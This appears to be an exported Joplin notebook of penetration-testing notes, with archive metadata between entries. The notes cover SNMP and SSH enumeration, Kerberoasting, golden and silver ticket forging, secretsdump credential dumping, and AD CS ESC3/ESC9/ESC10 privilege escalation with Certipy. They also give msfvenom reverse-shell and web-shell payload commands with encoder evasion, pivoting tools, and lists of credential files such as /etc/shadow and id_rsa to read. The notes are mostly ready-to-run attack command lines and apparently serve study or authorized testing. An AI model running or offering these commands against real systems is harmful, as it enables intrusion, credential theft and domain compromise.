- nmap 172.21.0.0 -Pn -sU -p 161 --script=

```

/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse
```


## Metasploit auxiliary modules: 
```
 auxiliary/scanner/misc/oki_scanner                                    
 auxiliary/scanner/snmp/aix_version                                   
 auxiliary/scanner/snmp/arris_dg950                                   
 auxiliary/scanner/snmp/brocade_enumhash                               
 auxiliary/scanner/snmp/cisco_config_tftp                               
 auxiliary/scanner/snmp/cisco_upload_file                              
 auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
 auxiliary/scanner/snmp/epmp1000_snmp_loot                             
 auxiliary/scanner/snmp/netopia_enum                                    
 auxiliary/scanner/snmp/sbg6580_enum                                 
 auxiliary/scanner/snmp/snmp_enum                                 
 auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
 auxiliary/scanner/snmp/snmp_enumshares                                
 auxiliary/scanner/snmp/snmp_enumusers                                 
 auxiliary/scanner/snmp/snmp_login                                     
```

# Other Tools:
## Onesixtyone: 

- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

## Snmp-check

- snmp-check 172.21.0.0 -c public

## Impacket: 

- python3 samdump.py SNMP 172.21.0.0


id: 2385ee602a604722bb401825d10fcdac
parent_id: ae4f3be8ea3848acb2e9817af509450d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T04:31:24.047Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132334
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T04:31:24.047Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 126f9a46140514afbb90702f455a97f5d.md000644 0000000611 14666154175012464 0ustar00000000 000000 1. Recon Notes

id: 26f9a46140514afbb90702f455a97f5d
created_time: 2024-09-04T21:42:11.985Z
updated_time: 2024-09-04T21:57:35.323Z
user_created_time: 2024-09-04T21:42:11.985Z
user_updated_time: 2024-09-04T21:57:35.323Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 228d703041b2143b1852ddfcc82997eef.md000644 0000002516 14666154175012552 0ustar00000000 000000 Rubeus

# Source

- https://github.com/GhostPack/Rubeus

Review the opsec notes before compiling the program in visual studio. 

## ASREProasting:

chek for users in the current domain:

- Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

## Kerberoasting:

- Rubeus.exe kerberoast /outfile:<output_TGSs_file>

- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 

## Pass the key (PTK):

- .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt


## Using the ticket on a Windows target: 

- Rubeus.exe ptt /ticket:<ticket_kirbi_file>

id: 28d703041b2143b1852ddfcc82997eef
parent_id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132693
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 128e9f7a90a814f58b45340ed75e4dead.md000644 0000003442 14666154175012725 0ustar00000000 000000 Enumerating SSH

# Manual Connection

```
$ ssh 172.21.0.0 -p22
$ nc -nv 172.21.0.0 22 # Might give header
```

# SSH Enumeration Tools

## Nmap Enumeration
```
$ ls -lh /usr/share/nmap/scripts/ | grep ssh
-rw-r--r-- 1 root root 5.3K Oct 12 09:29 ssh2-enum-algos.nse
-rw-r--r-- 1 root root 1.2K Oct 12 09:29 ssh-auth-methods.nse
-rw-r--r-- 1 root root 3.0K Oct 12 09:29 ssh-brute.nse
-rw-r--r-- 1 root root  16K Oct 12 09:29 ssh-hostkey.nse
-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ssh-publickey-acceptance.nse
-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ssh-run.nse
-rw-r--r-- 1 root root 1.4K Oct 12 09:29 sshv1.nse

$ nmap 172.21.0.0 -p 22 -sV ssh-hostkey --script-args ssh_hostkey=full
$ nmap 172.21.0.0 -p 22 -sV ssh-auth-methods --script-args="ssh.user=root"
```

## Netexec

```
- Netexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce
- Netexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce -x whoami
```

## SSH Audit: 
Source: https://github.com/jtesta/ssh-audit

```
python ssh-audit.py [-1246pbcnjvlt] 172.21.0.0
```

## Metasploit
```
Auxilary Modules:
auxiliary/scanner/ssh/ssh_version
use scanner/ssh/ssh_enumusers
```


id: 28e9f7a90a814f58b45340ed75e4dead
parent_id: f77ffebdf524416ca2f9632ddd6b2de2
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-07T16:44:34.933Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132173
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-07T16:44:34.933Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 12bb0d6b24b2a4affa12e5574b125661f.md000644 0000003625 14666154175012663 0ustar00000000 000000 5. ESC3 Certificate Templates

# General Overview

An ESC3 vulnerable template permits the issuance of certificates on behalf of any user, enabling the potential impersonation of other users. This vulnerability arises because the template includes the Certificate Request Agent EKU. Specifically, the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) grants the ability to request certificates on behalf of other principals.

To exploit this misconfiguration, the Certificate Authority (CA) must have at least two templates that meet the following conditions:

1. The template allows a low-privileged user to enroll in an enrollment agent certificate.
2. The Approval Manager is disabled.
3. Authorized signatures are not required.
4. The certificate template defines the Certificate Request Agent EKU, enabling the request of other certificate templates on behalf of other principals.

# Abusing ESC3 Certificates

## Certipy:
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template' 
- `certipy-ad req -u "afsimmons@megacorpone.com" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'vulnerable template'  -on-behalf-of 'Megacorpone\Xadmin' -pfx 'xadmin.pfx'

id: 2bb0d6b24b2a4affa12e5574b125661f
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-30T01:22:08.955Z
updated_time: 2024-08-30T02:00:50.879Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132249
user_created_time: 2024-08-30T01:22:08.955Z
user_updated_time: 2024-08-30T02:00:50.879Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 12c14cd3f480f421e9acaa6187feb2a01.md000644 0000002425 14666154175012745 0ustar00000000 000000 Kerberos Ticket Creation

# Generate Silver Tickets with Impacket:
- python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# Generate Golden Tickets:
- python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Credential Access with Secretsdump

- impacket-secretsdump username@target-ip -dc-ip target-ip

id: 2c14cd3f480f421e9acaa6187feb2a01
parent_id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132656
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 12d1dc1584e114e8da04261e22246aaba.md000644 0000004326 14666154175012575 0ustar00000000 000000 10. ESC9 Certificate Templates

# General Overview: 

The `CT_FLAG_NO_SECURITY_EXTENSION` (0x80000) value for the `msPKI-Enrollment-Flag`, known as ESC9, prevents the inclusion of the `szOID_NTDS_CA_SECURITY_EXT` security extension in certificates. This flag is particularly important when `StrongCertificateBindingEnforcement` is set to 1 (the default), as opposed to 2. Its significance increases in scenarios where weaker certificate mappings for Kerberos or Schannel could be exploited, such as in ESC10, since the absence of ESC9 would not affect the security requirements.

## Requirements: 
- StrongCertificateBindingEnforcement set to 1 (default) or 0
- Certificate contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value
- Certificate specifies Any Client authentication EKU
- GenericWrite over any account A to compromise any account B
# Abusing ESC9  Certificate Templates

## Scenario 1 

afsimmons@megacorpone.com has GenericWrite over xadmin@megacorpone.com, and we want to compromise Administrator@megacorpone.com. xadmin@megacorpone.com is allowed to enroll in the certificate template ESC9 that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.
## Certipy

- certipy-ad shadow auto -username afsimmons@megacorpone.com -p Spawn123! -account xadmin
- certipy-ad account update -username afsimmons@megacorpone.com -p Spawn123! -user xadmin -upn Administrator
- certipy-ad req -username afsimmons@megacorpone.com -password Spawn123! -user xadmin@megacorpone.com
- certipy-ad auth -pfx administrator.pfx -domain megacorpone.com


id: 2d1dc1584e114e8da04261e22246aaba
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-31T17:41:43.574Z
updated_time: 2024-08-31T18:40:12.341Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132205
user_created_time: 2024-08-31T17:41:43.574Z
user_updated_time: 2024-08-31T18:40:12.341Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 130c1b48e05ee494f96020602fdd3ab8c.md000644 0000007143 14666154175012621 0ustar00000000 000000 6. Msfvenom

## Creating a payload

- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

To view list of payloads: msfvenom -l payloads
To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

## Creating a payload with encoding

- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile

## Creating a payload using a template

- msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile

## Listening for MSfvenom Payloads:

```
msf5>use exploit/multi/handler  
msf5>set payload windows/meterpreter/reverse_tcp  
msf5>set lhost <IP>  
msf5>set lport <PORT>  
msf5> set ExitOnSession false  
msf5>exploit -j  
```

## Windows Payloads

- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe	
- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe	
- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

## Linux Payloads

- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf	
- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Add a user in windows with msfvenom: 

- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

## Web Payloads

PHP

- msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>  -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

## Scripting Payloads

Python

- msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

- msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

- msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Creating an Msfvenom Payload with an encoder while removing bad charecters:

- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

## Resources:

- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/

id: 30c1b48e05ee494f96020602fdd3ab8c
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-12T16:38:08.464Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132475
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-12T16:38:08.464Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1323971dda5ee4d3bb6b431f59f68ca7b.md000644 0000000602 14666154175012767 0ustar00000000 000000 Network

id: 323971dda5ee4d3bb6b431f59f68ca7b
created_time: 2024-09-04T21:42:12.671Z
updated_time: 2024-09-04T21:58:05.406Z
user_created_time: 2024-09-04T21:42:12.671Z
user_updated_time: 2024-09-04T21:58:05.406Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 23b564ef55d0146539fe7746097d9d39c.md000644 0000000640 14666154175012440 0ustar00000000 000000 9. High Value Information & Reporting

id: 3b564ef55d0146539fe7746097d9d39c
created_time: 2024-09-04T21:42:12.820Z
updated_time: 2024-09-04T21:59:46.750Z
user_created_time: 2024-09-04T21:42:12.820Z
user_updated_time: 2024-09-04T21:59:46.750Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 23b6c5dccbf774668adeac8931599d503.md000644 0000005032 14666154175012725 0ustar00000000 000000 General Notes Linux

## Finding Sensitive files on Linux: 

```
locate password | more           
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
```
- cat /etc/profile
- cat /etc/passwd
- cat /etc/group
- cat /etc/shadow
- cat /etc/gshadow
- cat /var/apache2/config.inc
- cat /var/lib/mysql/mysql/user.MYD
- cat /root/anaconda-ks.cfg
- cat ~/.bash_history
- cat ~/.bash_profile
- cat ~/.bash_login
- cat ~/.nano_history
- cat ~/.atftp_history
- cat ~/.mysql_history
- cat ~/.php_history
- ls -alh /var/mail/

Sensitive Files for SSH:

- find / -name authorized_keys 2> /dev/null
- find / -name id_rsa 2> /dev/null



Log Files that could help:

```
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
```

id: 3b6c5dccbf774668adeac8931599d503
parent_id: 7b7c6aedc09c4765877ef430c7c267db
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132553
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 13d2acfdac1264ff883efa0ee8c095df6.md000644 0000005775 14666154175013230 0ustar00000000 000000 Other Tools and Resources



# Metasploit
## Meterpreter

Use only if you have a meterpreter shell and you need to pivot to another network.

## Portfwd

- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80

## Autoroute
In Metasploit
1. use post/multi/manage/autoroute
```
msf5 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted:                                         add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR                                         as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf5 post(multi/manage/autoroute) > 
```
2. set session "avaliable session"
3. run  

## Metasploit Socks Proxy

   1  auxiliary/server/socks4a                                  normal  No     Socks4a Proxy Server
   2  auxiliary/server/socks5                                   normal  No     Socks5 Proxy Server
   3  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection



# Cntlm

apt install cntlm

1. cntlm -u username@breakme.local -I proxy
2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"
# More tools:

- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- httptunnel: sudo apt install httptunnel
- ligolo: https://github.com/sysdream/ligolo
- ligolo-ng: https://github.com/nicocha30/ligolo-ng/releases
- reGeorg: https://github.com/sensepost/reGeorg

# Resources to learn more about pivoting/tunneling:

- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464
- https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding



id: 3d2acfdac1264ff883efa0ee8c095df6
parent_id: 4869250b5e7045b3ae62e7b6f02cac08
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:33:31.979Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132061
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:33:31.979Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 13d952c01f8714d48887a2785a84c3fbb.md000644 0000000613 14666154175012504 0ustar00000000 000000 Users and Groups

id: 3d952c01f8714d48887a2785a84c3fbb
created_time: 2024-09-04T21:42:12.774Z
updated_time: 2024-09-04T21:58:18.553Z
user_created_time: 2024-09-04T21:42:12.774Z
user_updated_time: 2024-09-04T21:58:18.553Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 245b2694a52b149c982a159cccb1c6a2b.md000644 0000000621 14666154175012613 0ustar00000000 000000 Installed Applications

id: 45b2694a52b149c982a159cccb1c6a2b
created_time: 2024-09-04T21:42:12.586Z
updated_time: 2024-09-04T21:58:01.067Z
user_created_time: 2024-09-04T21:42:12.586Z
user_updated_time: 2024-09-04T21:58:01.067Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 533f89ee69a545b7a416b814f14e5d3d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2471251f6328c4e999d08ba4b56bd1e3d.md000644 0000001405 14666154175012553 0ustar00000000 000000 Target

# This is a placeholder to contain all notes regarding the exploitation phase for each target you assess.

id: 471251f6328c4e999d08ba4b56bd1e3d
parent_id: c8f8a25244cc4dfbbabbf0d9aeabc5f4
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132502
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 14869250b5e7045b3ae62e7b6f02cac08.md000644 0000000615 14666154175012542 0ustar00000000 000000 Pivoting-Tunneling

id: 4869250b5e7045b3ae62e7b6f02cac08
created_time: 2024-09-04T21:42:12.050Z
updated_time: 2024-09-04T21:42:12.050Z
user_created_time: 2024-09-04T21:42:12.050Z
user_updated_time: 2024-09-04T21:42:12.050Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 26f9a46140514afbb90702f455a97f5d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 24aaeb4634116442995c68dbe5264409a.md000644 0000001415 14666154175012407 0ustar00000000 000000 Identifying Hash Types

In Kali: 

- Hash-identifier

Online: 

- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/

id: 4aaeb4634116442995c68dbe5264409a
parent_id: dcb4d790b01144b7ada27167784dae15
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132911
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 14d79d61f48fc4e40abe65ec0fb3ecca5.md000644 0000003643 14666154175013214 0ustar00000000 000000 General Notes

# Note: Be cautious when brute forcing Active Directory, as it can trigger the Account Lockout Policy and disable user accounts.


## Anonymous Credential LDAP Dumping: 

- ldapsearch -LLL -x -H ldap://"domain fqdn" -b ‘’ -s base ‘(objectclass=*)’

Impacket GetADUsers.py (Must have valid credentials)

- GetADUsers.py -all domain\User -dc-ip 172.21.0.0

Impacket lookupsid.py:

- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0

Impacket Secretdump:

python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin

Windapsearch:

https://github.com/ropnop/windapsearch 

- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U

## Netexec:

- netexec ldap "ip-address" -u "" -p "" -d "domain"

- netexec ldap "ip address" -u "Guest" -p "" -d "domain"

## Enumerating for users through kerberos

- sudo nmap --script=krb5-enum-users --script-args="krb5-enum-users.realm='megacorpone.com',users.txt" 172.21.0.0

## References: 

- PayloadAllTheThings:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise

- Attacking Active Directory: 0 to 0.9:
https://zer1t0.gitlab.io/posts/attacking_ad/

id: 4d79d61f48fc4e40abe65ec0fb3ecca5
parent_id: 5abb8619041a4e3a9db073dd97403fa1
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:32:37.751Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132296
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:32:37.751Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 14ea66ebc33d64a02880510457f803025.md000644 0000000601 14666154175012306 0ustar00000000 000000 1. FTP

id: 4ea66ebc33d64a02880510457f803025
created_time: 2024-09-04T21:42:12.155Z
updated_time: 2024-09-04T21:42:12.155Z
user_created_time: 2024-09-04T21:42:12.155Z
user_updated_time: 2024-09-04T21:42:12.155Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 24edf2d31447840a9a9a97ca9dfb82926.md000644 0000004765 14666154175012661 0ustar00000000 000000 11. ESC10 Certificate Templates

# General Overview: 

Exploiting ESC10 in AD CS involves taking advantage of weak certificate mapping configurations that allow low-privileged users to obtain certificates capable of high-privilege impersonation. In environments where ESC10 is present, attackers can request certificates that lack proper security extensions, such as the `szOID_NTDS_CA_SECURITY_EXT`. 

These certificates can then be used to authenticate as privileged accounts, like domain controllers, enabling the attacker to escalate privileges and potentially compromise the entire domain. 

This attack is particularly effective when the `StrongCertificateBindingEnforcement` setting is not strictly enforced, allowing certificates with weak or absent security extensions to be accepted by Kerberos or Schannel.

## Requirements: 

- StrongCertificateBindingEnforcement set to 0
- GenericWrite over any account A to compromise any account B
 

# Abusing ESC10  Certificate Templates

## Scenario 1: 

## Certipy

- certipy-ad shadow auto -username afsimmons@megacorpone.com -p Spawn123! -account xadmin
- certipy-ad account update -username afsimmons@megacorpone.com -p Spawn123! -user xadmin -upn Administrator
- certipy-ad rec -CA 'corp-DC-CA' -username xadmin@megacorpone.com -hashes "NT HASH"
